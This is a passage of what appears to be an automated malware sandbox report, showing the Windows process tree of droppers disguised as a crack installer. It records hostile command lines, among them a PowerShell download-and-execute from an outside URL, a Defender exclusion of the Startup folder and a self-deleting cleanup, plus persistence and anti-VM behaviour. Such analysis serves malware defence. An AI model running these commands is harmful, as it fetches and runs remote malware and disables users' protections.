  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
  2⤵
  PID:2756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2344 /prefetch:1
  2⤵
  PID:2464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1704 /prefetch:1
  2⤵
  PID:6552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1
  2⤵
  PID:548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7260 /prefetch:1
  2⤵
  PID:5432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7220 /prefetch:1
  2⤵
  PID:3388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2824 -ip 2824
1⤵
PID:2812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2824 -ip 2824
1⤵
PID:6100

C:\Users\Admin\Desktop\New folder\HeInstaller\v40.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\v40.exe"
1⤵
PID:5128
- C:\Windows\SysWOW64\Wbem\wmic.exe
  wmic csproduct get uuid
  2⤵
  PID:1124

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3036

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (1).exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (1).exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:908
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
  2⤵
  PID:4208
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 908 -s 148
  2⤵
  - Program crash
  PID:3384

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (2).exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (2).exe"
1⤵
PID:5356
- C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zap7751.exe
  C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zap7751.exe
  2⤵
  PID:2376
- - C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\zap9196.exe
    C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\zap9196.exe
    3⤵
    PID:1552
  - - C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\zap9710.exe
      C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\zap9710.exe
      4⤵
      PID:3900
    - - C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\tz9517.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\tz9517.exe
        5⤵
        
        PID:4876
    - - C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\v4630nF.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\v4630nF.exe
        5⤵
        
        PID:5612
  - - C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\w43kj59.exe
      C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\w43kj59.exe
      4⤵
      PID:4104
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 1308
        5⤵
        Program crash
        
        PID:6408
- - C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\xeyVI11.exe
    C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\xeyVI11.exe
    3⤵
    PID:6964
- C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y69TC67.exe
  C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y69TC67.exe
  2⤵
  PID:6684

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (1).exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (1).exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5952
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
  2⤵
  PID:5372
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5952 -s 140
  2⤵
  - Program crash
  PID:4440

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (2)2.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (2)2.exe"
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1380
- C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\zitV0071.exe
  C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\zitV0071.exe
  2⤵
  PID:3648
- - C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\jr866572.exe
    C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\jr866572.exe
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - Executes dropped EXE
    - Windows security modification
    PID:4548
- - C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\ku834241.exe
    C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\ku834241.exe
    3⤵
    - Executes dropped EXE
    PID:5136
- C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\lr153091.exe
  C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\lr153091.exe
  2⤵
  PID:4428
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 436
  2⤵
  - Program crash
  PID:6684

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (3).exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (3).exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:5600
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2388
- - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe" -h
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - Executes dropped EXE
    - Windows security modification
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:2112
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\brg.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\brg.exe"
  2⤵
  PID:4864
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:2212
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
    3⤵
    PID:2752
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe"
    3⤵
    PID:3524
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\sqlcmd.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\sqlcmd.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5516
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://neutropharma.com/wp/wp-content/debug2.ps1')"
    3⤵
    PID:4188
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command IEX(New-Object Net.Webclient).DownloadString('https://neutropharma.com/wp/wp-content/debug2.ps1')
      4⤵
      Blocklisted process makes network request
      PID:5416
- - C:\ProgramData\6BF6.tmp.exe
    "C:\ProgramData\6BF6.tmp.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    PID:6108
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\sqlcmd.exe" >> NUL
    3⤵
    PID:4356
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:4036
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\KiffAppE2.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\KiffAppE2.exe"
  2⤵
  - Executes dropped EXE
  PID:5408
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\lower.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\lower.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5784
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 456
    3⤵
    - Program crash
    PID:5472
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss29.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss29.exe"
  2⤵
  PID:5720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2824 -ip 2824
1⤵
PID:5928

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:1984
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
  2⤵
  - Loads dropped DLL
  PID:5276
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 600
    3⤵
    - Program crash
    PID:3732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5276 -ip 5276
1⤵
PID:4036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2824 -ip 2824
1⤵
PID:1516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 908 -ip 908
1⤵
PID:796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5952 -ip 5952
1⤵
PID:5504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5784 -ip 5784
1⤵
PID:1672

C:\ProgramData\sshDesktop-type0.8.0.3\sshDesktop-type0.8.0.3.exe
C:\ProgramData\sshDesktop-type0.8.0.3\sshDesktop-type0.8.0.3.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Accesses Microsoft Outlook profiles
- Checks whether UAC is enabled
PID:1336

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3976

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
PID:5544
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
  2⤵
  PID:2192
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'
    3⤵
    PID:2856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4024 -ip 4024
1⤵
PID:5248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4808 -ip 4808
1⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4496 -ip 4496
1⤵
PID:4600

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (1).exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (1).exe"
1⤵
PID:1728
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
  2⤵
  PID:6860
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 368
  2⤵
  - Program crash
  PID:6296

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (2).exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (2).exe"
1⤵
- Adds Run key to start application
PID:5836
- C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap7751.exe
  C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap7751.exe
  2⤵
  - Adds Run key to start application
  PID:5380
- - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap9196.exe
    C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap9196.exe
    3⤵
    - Adds Run key to start application
    PID:5364
  - - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\zap9710.exe
      C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\zap9710.exe
      4⤵
      Adds Run key to start application
      PID:856
    - - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\tz9517.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\tz9517.exe
        5⤵
        
        PID:1848
    - - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\v4630nF.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\v4630nF.exe
        5⤵
        
        PID:4676
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1076
        6⤵
        Program crash
        
        PID:4396
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\govno312321412412.bat
        6⤵
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
        
        nig1r21312312.exe exec hide fds333333333333333.bat
        7⤵
        
        PID:5652
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c fds333333333333333.bat
        8⤵
        
        PID:5680
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 60
        9⤵
        Delays execution with timeout.exe
        
        PID:9776
  - - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\w43kj59.exe
      C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\w43kj59.exe
      4⤵
      Modifies Windows Defender Real-time Protection settings
      Executes dropped EXE
      Windows security modification
      PID:5508
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 1308
        5⤵
        Program crash
        
        PID:6696
- - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xeyVI11.exe
    C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xeyVI11.exe
    3⤵
    PID:6324
- C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\y69TC67.exe
  C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\y69TC67.exe
  2⤵
  PID:5328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\govno312321412412.bat
    3⤵
    PID:6200
  - - C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
      nig1r21312312.exe exec hide fds333333333333333.bat
      4⤵
      PID:7720

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (2)2.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (2)2.exe"
1⤵
PID:5648
- C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\zitV0071.exe
  C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\zitV0071.exe
  2⤵
  - Adds Run key to start application
  PID:5804
- - C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\jr866572.exe
    C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\jr866572.exe
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - Windows security modification
    PID:4952
- - C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\ku834241.exe
    C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\ku834241.exe
    3⤵
    PID:6324
- C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\lr153091.exe
  C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\lr153091.exe
  2⤵
  PID:2844
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 460
  2⤵
  - Program crash
  PID:4560

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (3).exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (3).exe"
1⤵
- Checks computer location settings
PID:5560
- C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe"
  2⤵
  PID:4876
- - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe" -h
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:4356
- C:\Users\Admin\AppData\Local\Temp\RarSFX2\brg.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\brg.exe"
  2⤵
  PID:5748
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
    3⤵
    PID:4908
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"
    3⤵
    PID:4044
- C:\Users\Admin\AppData\Local\Temp\RarSFX2\sqlcmd.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\sqlcmd.exe"
  2⤵
  - Checks computer location settings
  PID:6260
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://neutropharma.com/wp/wp-content/debug2.ps1')"
    3⤵
    PID:6724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command IEX(New-Object Net.Webclient).DownloadString('https://neutropharma.com/wp/wp-content/debug2.ps1')
      4⤵
      Blocklisted process makes network request
      PID:5436
- - C:\ProgramData\7BC6.tmp.exe
    "C:\ProgramData\7BC6.tmp.exe"
    3⤵
    PID:6540
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\sqlcmd.exe" >> NUL
    3⤵
    - Suspicious use of SetThreadContext
    PID:5748
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
      4⤵
      Loads dropped DLL
      PID:3288
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe"
      4⤵
      PID:3920
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe"
      4⤵
      PID:4616
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:7052
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
      4⤵
      PID:5124
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe"
      4⤵
      PID:1068
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
      4⤵
      PID:4972
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
      4⤵
      PID:1112
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
      4⤵
      PID:6028
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe"
      4⤵
      PID:864
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe"
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:3824
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe"
      4⤵
      PID:5840
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe"
      4⤵
      PID:2840
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe"
      4⤵
      PID:3828
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe"
      4⤵
      PID:4236
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
      4⤵
      Loads dropped DLL
      Drops file in Program Files directory
      Suspicious use of SetWindowsHookEx
      PID:1384
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe"
      4⤵
      PID:5860
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe"
      4⤵
      PID:5692
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe"
      4⤵
      PID:4392
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:2948
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe"
      4⤵
      PID:1168
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
      4⤵
      PID:4016
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe"
      4⤵
      PID:5884
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
      4⤵
      PID:5788
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe"
      4⤵
      PID:5232
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"
      4⤵
      PID:4836
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:3708
- C:\Users\Admin\AppData\Local\Temp\RarSFX2\KiffAppE2.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\KiffAppE2.exe"
  2⤵
  PID:4396
- C:\Users\Admin\AppData\Local\Temp\RarSFX2\lower.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\lower.exe"
  2⤵
  PID:6228
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6228 -s 452
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - Executes dropped EXE
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    PID:4104
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6228 -s 764
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Program crash
    PID:1552
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6228 -s 808
    3⤵
    - Program crash
    PID:728
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6228 -s 800
    3⤵
    - Program crash
    PID:1012
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6228 -s 780
    3⤵
    - Program crash
    PID:2512
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6228 -s 776
    3⤵
    - Program crash
    PID:2916
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6228 -s 1020
    3⤵
    - Program crash
    PID:3832
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6228 -s 1072
    3⤵
    - Program crash
    PID:3864
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6228 -s 1376
    3⤵
    - Program crash
    PID:6340
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:4784
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sdfsfs3wefdsfsdfsd.bat" "
        5⤵
        
        PID:5224
      - C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
        
        nig1r21312312.exe exec hide nig1r21312312.exe exec hide cock123123444.bat
        6⤵
        
        PID:5816
        
        C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
        
        nig1r21312312.exe exec hide cock123123444.bat
        7⤵
        
        PID:4180
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cock123123444.bat
        8⤵
        
        PID:5048
        
